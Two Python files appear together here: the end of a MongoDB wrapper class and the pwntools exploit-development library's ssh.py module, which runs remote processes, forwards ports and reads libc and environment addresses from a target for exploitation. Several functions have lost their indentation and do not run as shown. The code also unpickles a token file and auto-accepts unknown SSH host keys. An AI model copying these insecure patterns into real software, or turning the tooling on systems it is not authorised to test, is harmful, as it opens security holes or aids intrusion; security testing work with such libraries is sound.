    # persistence elsewhere in this class; TODO confirm against full file.
    self.save_lock = Lock()
    self.last_save = time.time()
    self.save_interval = 5
    self.logger = logging.getLogger(logger_name)
    self.resume_token_path = resume_token_path
def get(self, key, value):
    """
    Get all documents from the collection that match document[key] == value.
    :param key: The name of the key
    :param value: The value that the property must have
    :return: Instance of cursor corresponding to the query
    """
    query = {key: value}
    return self.coll.find(query)
def get_by_id(self, doc_id):
    """
    Gets a document from the collection by ID.
    :param doc_id: The document ID
    :return: The document (if it exists)
    """
    matches = self.get('_id', doc_id)
    return matches[0]
def get_multiple_by_ids(self, ids):
    """
    Get multiple documents by their IDs.
    :param ids: All IDs that should be found
    :return: Instance of cursor corresponding to the query
    """
    id_filter = {'_id': {'$in': ids}}
    return self.coll.find(id_filter)
def insert(self, doc_id, doc):
    """
    Insert a document into the collection, assigning doc_id as its _id
    when the document does not already carry one.
    :param doc_id: ID of the document
    :param doc: A dictionary representing a document
    """
    doc.setdefault('_id', doc_id)
    self.coll.insert_one(doc)
def update(self, doc_id, data, *time_fields):
    """
    Apply a $set update of `data` to document doc_id (upserting), optionally
    stamping the given time_fields with the current time.
    :param doc_id: The ID of the document to update
    :param data: A dictionary with all updates to make
    :param time_fields: All properties that should have their value set to the current time
    """
    ops = self._get_base_update_dict(*time_fields)
    ops['$set'] = data
    self.coll.update_one({'_id': doc_id}, ops, upsert=True)
def update_key_value(self, doc_id, key, value, *time_fields):
    """
    Set a single property on document doc_id (upserting), optionally
    stamping the given time_fields with the current time.
    :param doc_id: The ID of the document to update
    :param key: The key of the property to update
    :param value: The new value of the given property
    :param time_fields: All properties that should have their value set to the current time
    """
    ops = self._get_base_update_dict(*time_fields)
    ops['$set'] = {key: value}
    self.coll.update_one({'_id': doc_id}, ops, upsert=True)
def increment(self, doc_id, key, value, *time_fields):
    """
    Increment the value of a property in a document (upserting), optionally
    stamping the given time_fields with the current time.
    :param doc_id: The ID of the document to update
    :param key: The key of the property to increment
    :param value: The increment value
    :param time_fields: All properties that should have their value set to the current time
    """
    ops = self._get_base_update_dict(*time_fields)
    ops['$inc'] = {key: value}
    self.coll.update_one({'_id': doc_id}, ops, upsert=True)
def add_to_set(self, doc_id, key, value, *time_fields):
    """
    Add *value* to the set stored under *key* via ``$addToSet``,
    optionally stamping timestamps.
    :param doc_id: The ID of the document to update
    :param key: The key of the set
    :param value: The value to add to the set
    :param time_fields: All properties that should have their value set to the current time
    """
    changes = self._get_base_update_dict(*time_fields)
    changes['$addToSet'] = {key: value}
    # NOTE(review): unlike update()/increment(), this does not pass
    # upsert=True -- confirm that missing documents should be skipped.
    self.coll.update_one({'_id': doc_id}, changes)
def watch(self, match, resume=True):
    """
    Watch the collection using a filter.
    :param match: BSON document specifying the filter criteria
    :param resume: Whether to resume the stream from where it stopped last time
    :return: A stream of documents as they get inserted/replaced/updated
    """
    if resume:
        resume_token = self._load_resume_token()
        if resume_token is not None:
            try:
                self.logger.info('Successfully loaded resume token')
                watch = self.coll.watch([{'$match': match}], full_document='updateLookup',
                                        resume_after=resume_token)
                self.logger.info('Successfully resumed watch')
                return watch
            # Narrowed from a bare 'except:' so KeyboardInterrupt/SystemExit
            # still propagate; any resume failure falls back to a fresh watch.
            except Exception:
                self.logger.warning('Unable to resume, probably because the oplog is too small. Trying again '
                                    'without resuming...')
                return self.watch(match, resume=False)
    watch = self.coll.watch([{'$match': match}], full_document='updateLookup')
    self.logger.info('Successfully started watch')
    return watch
def start_process(self, doc_id, process_name, *time_fields):
    """
    Mark the named process as started on the given document.
    Sets ``<process>.success`` to False, ``<process>.isRunning`` to True,
    and stamps ``<process>.startTime`` along with any extra *time_fields*.
    :param doc_id: The ID of the affected document
    :param process_name: The name of the process to be started
    :param time_fields: All properties that should have their value set to the current time
    """
    running_flags = {
        '{}.success'.format(process_name): False,
        '{}.isRunning'.format(process_name): True,
    }
    stamped = list(time_fields) + ['{}.startTime'.format(process_name)]
    self.update(doc_id, running_flags, *stamped)
def end_process(self, doc_id, process_name, success, results, *time_fields):
    """
    Mark the named process as finished on the given document.
    Records the success flag, clears ``isRunning``, copies *results* under
    the process namespace, and stamps ``<process>.endTime``.
    :param doc_id: The ID of the affected document
    :param process_name: The name of the process to be ended
    :param success: Whether the process executed successfully
    :param results: Any results to save with the process
    :param time_fields: All properties that should have their value set to the current time
    """
    finished = {
        '{}.success'.format(process_name): success,
        '{}.isRunning'.format(process_name): False,
    }
    for key in results:
        finished['{}.{}'.format(process_name, key)] = results[key]
    stamped = list(time_fields) + ['{}.endTime'.format(process_name)]
    self.update(doc_id, finished, *stamped)
def register_time_field(self, *time_fields):
    """Permanently register *time_fields* so every later update stamps them."""
    for field in time_fields:
        self.time_fields.append(field)
def _get_base_update_dict(self, *time_fields):
update_dict = dict()
if time_fields is not None and len(time_fields) > 0:
if '$currentDate' not in update_dict:
update_dict['$currentDate'] = dict()
for time_field in time_fields:
update_dict['$currentDate'][time_field] = True
if self.time_fields is not None and len(self.time_fields) > 0:
if '$currentDate' not in update_dict:
update_dict['$currentDate'] = dict()
for time_field in self.time_fields:
update_dict['$currentDate'][time_field] = True
return update_dict
def save_resume_token(self, doc):
    """
    Persist *doc*'s resume token on a background thread.
    The lock is held only while spawning the writer thread; using a
    ``with`` block (instead of manual acquire/release) guarantees the
    lock is released even if thread creation raises.
    :param doc: Change-stream document whose ``_id`` is the resume token
    """
    with self.save_lock:
        Thread(target=self._save_resume_token, args=[doc]).start()
def _save_resume_token(self, doc):
if time.time() - self.last_save > self.save_interval:
resume_token = doc.get('_id')
with open(self.resume_token_path, 'wb') as token_file:
pickle.dump(resume_token, token_file)
self.last_save = time.time()
def _load_resume_token(self):
resume_token = None
if self.save_lock.acquire():
try:
with open(self.resume_token_path, 'rb') as token_file:
resume_token = pickle.load(token_file)
except:
self.logger.exception('Unable to load resume token')
self.save_lock.release()
else:
raise IOError('Unable to acquire lock for loading resume token!')
return resume_token
|
ssh.py | from __future__ import absolute_import
from __future__ import division
import inspect
import logging
import os
import re
import shutil
import six
import string
import sys
import tarfile
import tempfile
import threading
import time
import types
from pwnlib import term
from pwnlib.context import context
from pwnlib.log import Logger
from pwnlib.log import getLogger
from pwnlib.term import text
from pwnlib.timeout import Timeout
from pwnlib.tubes.sock import sock
from pwnlib.util import hashes
from pwnlib.util import misc
from pwnlib.util import safeeval
from pwnlib.util.sh_string import sh_string
# Kill the warning line:
#   No handlers could be found for logger "paramiko.transport"
# A NullHandler discards records outright; the original
# StreamHandler(open(os.devnull, 'w+')) kept a file handle to
# /dev/null open for the life of the process for no benefit.
paramiko_log = logging.getLogger("paramiko.transport")
paramiko_log.addHandler(logging.NullHandler())
class ssh_channel(sock):
    """A single session channel multiplexed over a parent :class:`ssh`
    connection's paramiko transport, exposed through the normal pwnlib
    tube interface (send/recv/interactive/close)."""

    #: Parent :class:`ssh` object
    parent = None
    #: Remote host
    host = None
    #: Return code, or :const:`None` if the process has not returned
    #: Use :meth:`poll` to check.
    returncode = None
    #: :const:`True` if a tty was allocated for this channel
    tty = False
    #: Environment specified for the remote process, or :const:`None`
    #: if the default environment was used
    env = None
    #: Command specified for the constructor
    process = None

    def __init__(self, parent, process = None, tty = False, wd = None, env = None, raw = True, *args, **kwargs):
        """Open a new channel on *parent*'s transport and launch *process*
        (or an interactive shell when *process* is None).

        The command is assembled as a single shell line: cd into *wd*,
        export each *env* entry, optionally configure the tty via stty,
        then run the command itself.
        """
        super(ssh_channel, self).__init__(*args, **kwargs)
        # keep the parent from being garbage collected in some cases
        self.parent = parent
        self.returncode = None
        self.host = parent.host
        self.tty = tty
        self.env = env
        self.process = process
        self.cwd = wd or '.'
        if isinstance(wd, six.text_type):
            wd = context._encode(wd)
        env = env or {}
        msg = 'Opening new channel: %r' % (process or 'shell')
        # A list/tuple argv is shell-quoted element-by-element and joined
        # into one command line.
        if isinstance(process, (list, tuple)):
            process = b' '.join(context._encode(sh_string(s)) for s in process)
        if isinstance(process, six.text_type):
            process = context._encode(process)
        if process and wd:
            process = b'cd ' + sh_string(wd) + b' >/dev/null 2>&1;' + process
        if process and env:
            for name, value in env.items():
                nameb = context._encode(name)
                # Only valid shell identifiers may be exported.
                if not re.match(b'^[a-zA-Z_][a-zA-Z0-9_]*$', nameb):
                    self.error('run(): Invalid environment key %r' % name)
                export = b'export %s=%s;' % (nameb, sh_string(context._encode(value)))
                process = export + process
        if process and tty:
            if raw:
                process = b'stty raw -ctlecho -echo; ' + process
            else:
                process = b'stty -ctlecho -echo; ' + process
        # If this object is enabled for DEBUG-level logging, don't hide
        # anything about the command that's actually executed.
        if process and self.isEnabledFor(logging.DEBUG):
            # NOTE(review): (process,) is always truthy, so the 'shell'
            # fallback on this line is unreachable.
            msg = 'Opening new channel: %r' % ((process,) or 'shell')
        with self.waitfor(msg) as h:
            import paramiko
            try:
                self.sock = parent.transport.open_session()
            except paramiko.ChannelException as e:
                if e.args == (1, 'Administratively prohibited'):
                    self.error("Too many sessions open! Use ssh_channel.close() or 'with'!")
                raise e
            if self.tty:
                self.sock.get_pty('xterm', term.width, term.height)
                # Keep the remote pty size in sync with the local terminal.
                def resizer():
                    if self.sock:
                        try:
                            self.sock.resize_pty(term.width, term.height)
                        except paramiko.ssh_exception.SSHException:
                            pass
                self.resizer = resizer
                term.term.on_winch.append(self.resizer)
            else:
                self.resizer = None
            # Put stderr on stdout. This might not always be desirable,
            # but our API does not support multiple streams
            self.sock.set_combine_stderr(True)
            self.settimeout(self.timeout)
            if process:
                self.sock.exec_command(process)
            else:
                self.sock.invoke_shell()
            h.success()

    def kill(self):
        """kill()
        Kills the process.
        """
        self.close()

    def recvall(self, timeout = sock.forever):
        # We subclass tubes.sock which sets self.sock to None.
        #
        # However, we need to wait for the return value to propagate,
        # which may not happen by the time .close() is called by tube.recvall()
        tmp_sock = self.sock
        tmp_close = self.close
        self.close = lambda: None
        # NOTE(review): the 'timeout' parameter is immediately overridden
        # by the channel's own timeout here -- confirm intentional.
        timeout = self.maximum if self.timeout is self.forever else self.timeout
        data = super(ssh_channel, self).recvall(timeout)
        # Restore self.sock to be able to call wait()
        self.close = tmp_close
        self.sock = tmp_sock
        self.wait()
        self.close()
        # Again set self.sock to None
        self.sock = None
        return data

    def wait(self, timeout=sock.default):
        # TODO: deal with timeouts
        return self.poll(block=True)

    def poll(self, block=False):
        """poll() -> int
        Poll the exit code of the process. Will return None, if the
        process has not yet finished and the exit code otherwise.
        """
        if self.returncode is None and self.sock \
                and (block or self.sock.exit_status_ready()):
            # Spin on the status event so a KeyboardInterrupt can get
            # through instead of blocking indefinitely.
            while not self.sock.status_event.is_set():
                self.sock.status_event.wait(0.05)
            self.returncode = self.sock.recv_exit_status()
        return self.returncode

    def can_recv_raw(self, timeout):
        # Poll the paramiko channel in small sleeps until data is ready
        # or the countdown expires.
        with self.countdown(timeout):
            while self.countdown_active():
                if self.sock.recv_ready():
                    return True
                time.sleep(min(self.timeout, 0.05))
        return False

    def interactive(self, prompt = term.text.bold_red('$') + ' '):
        """interactive(prompt = pwnlib.term.text.bold_red('$') + ' ')
        If not in TTY-mode, this does exactly the same as
        meth:`pwnlib.tubes.tube.tube.interactive`, otherwise
        it does mostly the same.
        An SSH connection in TTY-mode will typically supply its own prompt,
        thus the prompt argument is ignored in this case.
        We also have a few SSH-specific hacks that will ideally be removed
        once the :mod:`pwnlib.term` is more mature.
        """
        # If we are only executing a regular old shell, we need to handle
        # control codes (specifically Ctrl+C).
        #
        # Otherwise, we can just punt to the default implementation of interactive()
        if self.process is not None:
            return super(ssh_channel, self).interactive(prompt)
        self.info('Switching to interactive mode')
        # We would like a cursor, please!
        term.term.show_cursor()
        event = threading.Event()
        # Background reader: forward remote output to stdout until EOF.
        def recv_thread(event):
            while not event.is_set():
                try:
                    cur = self.recv(timeout = 0.05)
                    cur = cur.replace(b'\r\n',b'\n')
                    cur = cur.replace(b'\r',b'')
                    if cur is None:
                        continue
                    elif cur == b'\a':
                        # Ugly hack until term understands bell characters
                        continue
                    stdout = sys.stdout
                    if not term.term_mode:
                        stdout = getattr(stdout, 'buffer', stdout)
                    stdout.write(cur)
                    stdout.flush()
                except EOFError:
                    self.info('Got EOF while reading in interactive')
                    event.set()
                    break
        t = context.Thread(target = recv_thread, args = (event,))
        t.daemon = True
        t.start()
        # Foreground loop: forward local keystrokes to the remote side.
        while not event.is_set():
            if term.term_mode:
                try:
                    data = term.key.getraw(0.1)
                except KeyboardInterrupt:
                    data = [3] # This is ctrl-c
                except IOError:
                    if not event.is_set():
                        raise
            else:
                stdin = getattr(sys.stdin, 'buffer', sys.stdin)
                data = stdin.read(1)
                if not data:
                    event.set()
                else:
                    data = bytearray(data)
            if data:
                try:
                    self.send(bytes(bytearray(data)))
                except EOFError:
                    event.set()
                    self.info('Got EOF while sending in interactive')
        while t.is_alive():
            t.join(timeout = 0.1)
        # Restore
        term.term.hide_cursor()

    def close(self):
        """Close the channel, recording the exit status first and
        detaching the terminal resize hook if one was installed."""
        self.poll()
        while self.resizer in term.term.on_winch:
            term.term.on_winch.remove(self.resizer)
        super(ssh_channel, self).close()

    def spawn_process(self, *args, **kwargs):
        # Not supported on a channel; always errors out.
        self.error("Cannot use spawn_process on an SSH channel.""")

    def _close_msg(self):
        self.info('Closed SSH channel with %s' % self.host)
class ssh_process(ssh_channel):
    """An :class:`ssh_channel` that was started via :meth:`ssh.process`,
    augmented with process metadata (pid, argv, executable) gathered by
    the remote bootstrap script."""

    #: Working directory
    cwd = None
    #: PID of the process
    #: Only valid when instantiated through :meth:`ssh.process`
    pid = None
    #: Executable of the process
    #: Only valid when instantiated through :meth:`ssh.process`
    executable = None
    #: Arguments passed to the process
    #: Only valid when instantiated through :meth:`ssh.process`
    argv = None

    def libs(self):
        """libs() -> dict
        Returns a dictionary mapping the address of each loaded library in the
        process's address space.
        If ``/proc/$PID/maps`` cannot be opened, the output of ldd is used
        verbatim, which may be different than the actual addresses if ASLR
        is enabled.
        """
        maps = self.parent.libs(self.executable)
        maps_raw = self.parent.cat('/proc/%d/maps' % self.pid).decode()
        for lib in maps:
            # Downloaded library paths are prefixed with the host name;
            # strip that to match against the remote maps output.
            remote_path = lib.split(self.parent.host)[-1]
            for line in maps_raw.splitlines():
                if line.endswith(remote_path):
                    # First matching mapping is the library's base address.
                    address = line.split('-')[0]
                    maps[lib] = int(address, 16)
                    break
        return maps

    @property
    def libc(self):
        """libc() -> ELF
        Returns an ELF for the libc for the current process.
        If possible, it is adjusted to the correct address
        automatically.
        Examples:
        >>> s = ssh(host='example.pwnme')
        >>> p = s.process('true')
        >>> p.libc # doctest: +ELLIPSIS
        ELF(.../libc.so.6')
        """
        from pwnlib.elf import ELF
        for lib, address in self.libs().items():
            if 'libc.so' in lib:
                e = ELF(lib)
                e.address = address
                return e

    @property
    def elf(self):
        """elf() -> pwnlib.elf.elf.ELF
        Returns an ELF file for the executable that launched the process.
        """
        import pwnlib.elf.elf
        libs = self.parent.libs(self.executable)
        for lib in libs:
            # Cannot just check "executable in lib", see issue #1047
            if lib.endswith(self.executable):
                return pwnlib.elf.elf.ELF(lib)

    @property
    def corefile(self):
        # Locate and parse a core dump for this process; errors out when
        # no core file can be found.
        import pwnlib.elf.corefile
        finder = pwnlib.elf.corefile.CorefileFinder(self)
        if not finder.core_path:
            self.error("Could not find core file for pid %i" % self.pid)
        return pwnlib.elf.corefile.Corefile(finder.core_path)

    def getenv(self, variable, **kwargs):
        r"""Retrieve the address of an environment variable in the remote process.
        Examples:
        >>> s = ssh(host='example.pwnme')
        >>> p = s.process(['python', '-c', 'print("Hello")'])
        >>> hex(p.getenv('PATH')) # doctest: +ELLIPSIS
        '0x...'
        >>> p.recvall()
        b'Hello\n'
        """
        argv0 = self.argv[0]
        variable = context._encode(variable)
        # Small remote Python snippet: print the real executable path and
        # the libc getenv() pointer for the variable.
        script = ';'.join(('from ctypes import *',
                           'import os',
                           'libc = CDLL("libc.so.6")',
                           'getenv = libc.getenv',
                           'getenv.restype = c_void_p',
                           'print(os.path.realpath(%r))' % self.executable,
                           'print(getenv(%r))' % variable,))
        try:
            with context.local(log_level='error'):
                python = self.parent.which('python')
                if not python:
                    self.error("Python is not installed on the remote system.")
                io = self.parent.process([argv0,'-c', script.strip()],
                                         executable=python,
                                         env=self.env,
                                         **kwargs)
                path = io.recvline()
                address = int(io.recvall())
                # NOTE(review): compensates for the difference in argv[0]
                # length between the probe process and the target process,
                # which shifts the environment block -- confirm the
                # adjustment direction against the stack layout.
                address -= len(python)
                address += len(path)
                return int(address) & context.mask
        except Exception:
            self.exception("Could not look up environment variable %r" % variable)

    def _close_msg(self):
        # If we never completely started up, just use the parent implementation
        if self.executable is None:
            return super(ssh_process, self)._close_msg()
        self.info('Stopped remote process %r on %s (pid %i)' \
                  % (os.path.basename(self.executable),
                     self.host,
                     self.pid))
class ssh_connecter(sock):
    """Tube over a ``direct-tcpip`` channel: connects from the SSH server
    to ``host:port`` and exposes that TCP stream locally."""

    def __init__(self, parent, host, port, *a, **kw):
        super(ssh_connecter, self).__init__(*a, **kw)
        # keep the parent from being garbage collected in some cases
        self.parent = parent
        self.host = parent.host
        self.rhost = host
        self.rport = port
        msg = 'Connecting to %s:%d via SSH to %s' % (self.rhost, self.rport, self.host)
        with self.waitfor(msg) as h:
            try:
                self.sock = parent.transport.open_channel('direct-tcpip', (host, port), ('127.0.0.1', 0))
            except Exception as e:
                # BUG FIX: the original logged e.message, which does not
                # exist on Python 3 and raised AttributeError, masking the
                # real connection error.
                self.exception(str(e))
                raise
            try:
                # Iterate all layers of proxying to get to base-level Socket object
                curr = self.sock.get_transport().sock
                while getattr(curr, "get_transport", None):
                    curr = curr.get_transport().sock
                sockname = curr.getsockname()
                self.lhost = sockname[0]
                self.lport = sockname[1]
            except Exception as e:
                self.exception("Could not find base-level Socket object.")
                raise e
            h.success()

    def spawn_process(self, *args, **kwargs):
        # Not supported on a forwarded connection; always errors out.
        self.error("Cannot use spawn_process on an SSH channel.")

    def _close_msg(self):
        self.info("Closed remote connection to %s:%d via SSH connection to %s" % (self.rhost, self.rport, self.host))
class ssh_listener(sock):
    """Tube over a remote port forward: asks the SSH server to listen on
    ``bind_address:port`` and hands back the first inbound connection."""

    def __init__(self, parent, bind_address, port, *a, **kw):
        super(ssh_listener, self).__init__(*a, **kw)
        # keep the parent from being garbage collected in some cases
        self.parent = parent
        self.host = parent.host
        try:
            self.port = parent.transport.request_port_forward(bind_address, port)
        except Exception:
            # BUG FIX: the original called h.failure(...) here, but no 'h'
            # (progress handle) exists at this point, so the real error was
            # masked by a NameError.
            self.exception('Failed to create a port forwarding')
            raise
        # Accept the single inbound connection on a background thread so
        # the constructor returns immediately.
        def accepter():
            msg = 'Waiting on port %d via SSH to %s' % (self.port, self.host)
            h = self.waitfor(msg)
            try:
                self.sock = parent.transport.accept()
                # One-shot listener: cancel the forward once connected.
                parent.transport.cancel_port_forward(bind_address, self.port)
            except Exception:
                self.sock = None
                h.failure()
                self.exception('Failed to get a connection')
                return
            self.rhost, self.rport = self.sock.origin_addr
            h.success('Got connection from %s:%d' % (self.rhost, self.rport))
        self._accepter = context.Thread(target = accepter)
        self._accepter.daemon = True
        self._accepter.start()

    def _close_msg(self):
        self.info("Closed remote connection to %s:%d via SSH listener on port %d via %s" % (self.rhost, self.rport, self.port, self.host))

    def spawn_process(self, *args, **kwargs):
        # Not supported on a listener; always errors out.
        self.error("Cannot use spawn_process on an SSH channel.")

    def wait_for_connection(self):
        """Blocks until a connection has been established."""
        _ = self.sock
        return self

    def __getattr__(self, key):
        # Accessing .sock blocks until the accepter thread has finished,
        # so the first read/write transparently waits for the connection.
        if key == 'sock':
            while self._accepter.is_alive():
                self._accepter.join(timeout = 0.1)
            return self.sock
        else:
            return getattr(super(ssh_listener, self), key)
class ssh(Timeout, Logger):
#: Remote host name (``str``)
host = None
#: Remote port (``int``)
port = None
#: Working directory (``str``)
cwd = None
#: Enable caching of SSH downloads (``bool``)
cache = True
#: Paramiko SSHClient which backs this object
client = None
#: Paramiko SFTPClient object which is used for file transfers.
#: Set to :const:`None` to disable ``sftp``.
sftp = None
#: PID of the remote ``sshd`` process servicing this connection.
pid = None
def __init__(self, user=None, host=None, port=22, password=None, key=None,
keyfile=None, proxy_command=None, proxy_sock=None,
level=None, cache=True, ssh_agent=False, *a, **kw):
"""Creates a new ssh connection.
Arguments:
user(str): The username to log in with
host(str): The hostname to connect to
port(int): The port to connect to
password(str): Try to authenticate using this password
key(str): Try to authenticate using this private key. The string should be the actual private key.
keyfile(str): Try to authenticate using this private key. The string should be a filename.
proxy_command(str): Use this as a proxy command. It has approximately the same semantics as ProxyCommand from ssh(1).
proxy_sock(str): Use this socket instead of connecting to the host.
timeout: Timeout, in seconds
level: Log level
cache: Cache downloaded files (by hash/size/timestamp)
ssh_agent: If :const:`True`, enable usage of keys via ssh-agent
NOTE: The proxy_command and proxy_sock arguments is only available if a
fairly new version of paramiko is used.
Example proxying:
.. doctest::
:skipif: github_actions
>>> s1 = ssh(host='example.pwnme')
>>> r1 = s1.remote('localhost', 22)
>>> s2 = ssh(host='example.pwnme',
... proxy_sock=r1.sock)
>>> r2 = s2.remote('localhost', 22) # and so on...
>>> for x in r2, s2, r1, s1: x.close()
"""
super(ssh, self).__init__(*a, **kw)
Logger.__init__(self)
if level is not None:
self.setLevel(level)
self.host = host
self.port = port
self.user = user
self.password = password
self.key = key
self.keyfile = keyfile
self._cachedir = os.path.join(tempfile.gettempdir(), 'pwntools-ssh-cache')
self.cwd = '.'
self.cache = cache
# Deferred attributes
self._platform_info = {}
self._aslr = None
self._aslr_ulimit = None
misc.mkdir_p(self._cachedir)
# This is a dirty hack to make my Yubikey shut up.
# If anybody has a problem with this, please open a bug and I'll
# figure out a better workaround.
if not ssh_agent:
os.environ.pop('SSH_AUTH_SOCK', None)
import paramiko
# Make a basic attempt to parse the ssh_config file
try:
config_file = os.path.expanduser('~/.ssh/config')
if os.path.exists(config_file):
ssh_config = paramiko.SSHConfig()
ssh_config.parse(open(config_file))
host_config = ssh_config.lookup(host)
if 'hostname' in host_config:
self.host = host = host_config['hostname']
if not user and 'user' in host_config:
self.user = user = host_config['user']
if not keyfile and 'identityfile' in host_config:
keyfile = host_config['identityfile'][0]
if keyfile.lower() == 'none':
keyfile = None
except Exception as e:
self.debug("An error occurred while parsing ~/.ssh/config:\n%s" % e)
keyfiles = [os.path.expanduser(keyfile)] if keyfile else []
msg = 'Connecting to %s on port %d' % (host, port)
with self.waitfor(msg) as h:
self.client = paramiko.SSHClient()
self.client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
known_hosts = os.path.expanduser('~/.ssh/known_hosts')
if os.path.exists(known_hosts):
self.client.load_host_keys(known_hosts)
has_proxy = bool(proxy_sock or proxy_command)
if has_proxy:
if 'ProxyCommand' not in dir(paramiko):
self.error('This version of paramiko does not support proxies.')
if proxy_sock and proxy_command:
self.error('Cannot have both a proxy command and a proxy sock')
if proxy_command:
proxy_sock = paramiko.ProxyCommand(proxy_command)
self.client.connect(host, port, user, password, key, keyfiles, self.timeout, compress = True, sock = proxy_sock)
else:
self.client.connect(host, port, user, password, key, keyfiles, self.timeout, compress = True)
self.transport = self.client.get_transport()
self.transport.use_compression(True)
h.success()
self._tried_sftp = False
with context.local(log_level='error'):
def getppid():
print(os.getppid())
try:
self.pid = int(self.process('false', preexec_fn=getppid).recvall())
except Exception:
self.pid = None
try:
self.info_once(self.checksec())
except Exception:
self.warn_once("Couldn't check security settings on %r" % self.host)
@property
def sftp(self):
if not self._tried_sftp:
try:
self._sftp = self.transport.open_sftp_client()
except Exception:
self._sftp = None
self._tried_sftp = True
return self._sftp
@sftp.setter
def sftp(self, value):
self._sftp = value
self._tried_sftp = True
def __enter__(self, *a):
return self
def __exit__(self, *a, **kw):
self.close()
def shell(self, shell = None, tty = True, timeout = Timeout.default):
"""shell(shell = None, tty = True, timeout = Timeout.default) -> ssh_channel
Open a new channel with a shell inside.
Arguments:
shell(str): Path to the shell program to run.
If :const:`None`, uses the default shell for the logged in user.
tty(bool): If :const:`True`, then a TTY is requested on the remote server.
Returns:
Return a :class:`pwnlib.tubes.ssh.ssh_channel` object.
Examples:
>>> s = ssh(host='example.pwnme')
>>> sh = s.shell('/bin/sh')
>>> sh.sendline(b'echo Hello; exit')
>>> print(b'Hello' in sh.recvall())
True
"""
return self.run(shell, tty, timeout = timeout)
def process(self, argv=None, executable=None, tty=True, cwd=None, env=None, timeout=Timeout.default, run=True,
stdin=0, stdout=1, stderr=2, preexec_fn=None, preexec_args=(), raw=True, aslr=None, setuid=None,
shell=False):
r"""
Executes a process on the remote server, in the same fashion
as pwnlib.tubes.process.process.
To achieve this, a Python script is created to call ``os.execve``
with the appropriate arguments.
As an added bonus, the ``ssh_channel`` object returned has a
``pid`` property for the process pid.
Arguments:
argv(list):
List of arguments to pass into the process
executable(str):
Path to the executable to run.
If :const:`None`, ``argv[0]`` is used.
tty(bool):
Request a `tty` from the server. This usually fixes buffering problems
by causing `libc` to write data immediately rather than buffering it.
However, this disables interpretation of control codes (e.g. Ctrl+C)
and breaks `.shutdown`.
cwd(str):
Working directory. If :const:`None`, uses the working directory specified
on :attr:`cwd` or set via :meth:`set_working_directory`.
env(dict):
Environment variables to set in the child. If :const:`None`, inherits the
default environment.
timeout(int):
Timeout to set on the `tube` created to interact with the process.
run(bool):
Set to :const:`True` to run the program (default).
If :const:`False`, returns the path to an executable Python script on the
remote server which, when executed, will do it.
stdin(int, str):
If an integer, replace stdin with the numbered file descriptor.
If a string, a open a file with the specified path and replace
stdin with its file descriptor. May also be one of ``sys.stdin``,
``sys.stdout``, ``sys.stderr``. If :const:`None`, the file descriptor is closed.
stdout(int, str):
See ``stdin``.
stderr(int, str):
See ``stdin``.
preexec_fn(callable):
Function which is executed on the remote side before execve().
This **MUST** be a self-contained function -- it must perform
all of its own imports, and cannot refer to variables outside
its scope.
preexec_args(object):
Argument passed to ``preexec_fn``.
This **MUST** only consist of native Python objects.
raw(bool):
If :const:`True`, disable TTY control code interpretation.
aslr(bool):
See :class:`pwnlib.tubes.process.process` for more information.
setuid(bool):
See :class:`pwnlib.tubes.process.process` for more information.
shell(bool):
Pass the command-line arguments to the shell.
Returns:
A new SSH channel, or a path to a script if ``run=False``.
Notes:
Requires Python on the remote server.
Examples:
>>> s = ssh(host='example.pwnme')
>>> sh = s.process('/bin/sh', env={'PS1':''})
>>> sh.sendline(b'echo Hello; exit')
>>> sh.recvall()
b'Hello\n'
>>> s.process(['/bin/echo', b'\xff']).recvall()
b'\xff\n'
>>> s.process(['readlink', '/proc/self/exe']).recvall()
b'/bin/readlink\n'
>>> s.process(['LOLOLOL', '/proc/self/exe'], executable='readlink').recvall()
b'/bin/readlink\n'
>>> s.process(['LOLOLOL\x00', '/proc/self/cmdline'], executable='cat').recvall()
b'LOLOLOL\x00/proc/self/cmdline\x00'
>>> sh = s.process(executable='/bin/sh')
>>> str(sh.pid).encode() in s.pidof('sh') # doctest: +SKIP
True
>>> s.process(['pwd'], cwd='/tmp').recvall()
b'/tmp\n'
>>> p = s.process(['python','-c','import os; os.write(1, os.read(2, 1024))'], stderr=0)
>>> p.send(b'hello')
>>> p.recv()
b'hello'
>>> s.process(['/bin/echo', 'hello']).recvall()
b'hello\n'
>>> s.process(['/bin/echo', 'hello'], stdout='/dev/null').recvall()
b''
>>> s.process(['/usr/bin/env'], env={}).recvall()
b''
>>> s.process('/usr/bin/env', env={'A':'B'}).recvall()
b'A=B\n'
>>> s.process('false', preexec_fn=1234)
Traceback (most recent call last):
...
PwnlibException: preexec_fn must be a function
>>> s.process('false', preexec_fn=lambda: 1234)
Traceback (most recent call last):
...
PwnlibException: preexec_fn cannot be a lambda
>>> def uses_globals():
... foo = bar
>>> print(s.process('false', preexec_fn=uses_globals).recvall().strip().decode()) # doctest: +ELLIPSIS
Traceback (most recent call last):
...
NameError: ... name 'bar' is not defined
>>> s.process('echo hello', shell=True).recvall()
b'hello\n'
>>> io = s.process(['cat'], timeout=5)
>>> io.recvline()
b''
"""
if not argv and not executable:
self.error("Must specify argv or executable")
argv = argv or []
aslr = aslr if aslr is not None else context.aslr
if isinstance(argv, (six.text_type, bytes, bytearray)):
argv = [argv]
if not isinstance(argv, (list, tuple)):
self.error('argv must be a list or tuple')
if not all(isinstance(arg, (six.text_type, bytes, bytearray)) for arg in argv):
self.error("argv must be strings or bytes: %r" % argv)
if shell:
if len(argv) != 1:
self.error('Cannot provide more than 1 argument if shell=True')
argv = ['/bin/sh', '-c'] + argv
# Create a duplicate so we can modify it
argv = list(argv or [])
# Python doesn't like when an arg in argv contains '\x00'
# -> execve() arg 2 must contain only strings
for i, oarg in enumerate(argv):
if isinstance(oarg, six.text_type):
arg = oarg.encode('utf-8')
else:
arg = oarg
if b'\x00' in arg[:-1]:
self.error('Inappropriate nulls in argv[%i]: %r' % (i, oarg))
argv[i] = bytearray(arg.rstrip(b'\x00'))
if env is not None and not isinstance(env, dict) and env != os.environ:
self.error("env must be a dict: %r" % env)
# Converts the environment variables to a list of tuples to retain order.
env2 = []
# Python also doesn't like when envp contains '\x00'
if env and hasattr(env, 'items'):
for k, v in env.items():
if isinstance(k, six.text_type):
k = k.encode('utf-8')
if isinstance(v, six.text_type):
v = v.encode('utf-8')
if b'\x00' in k[:-1]:
self.error('Inappropriate nulls in environment key %r' % k)
if b'\x00' in v[:-1]:
self.error('Inappropriate nulls in environment value %r=%r' % (k, v))
env2.append((bytearray(k.rstrip(b'\x00')), bytearray(v.rstrip(b'\x00'))))
env = env2 or env
executable = executable or argv[0]
cwd = cwd or self.cwd
# Validate, since failures on the remote side will suck.
if not isinstance(executable, (six.text_type, six.binary_type, bytearray)):
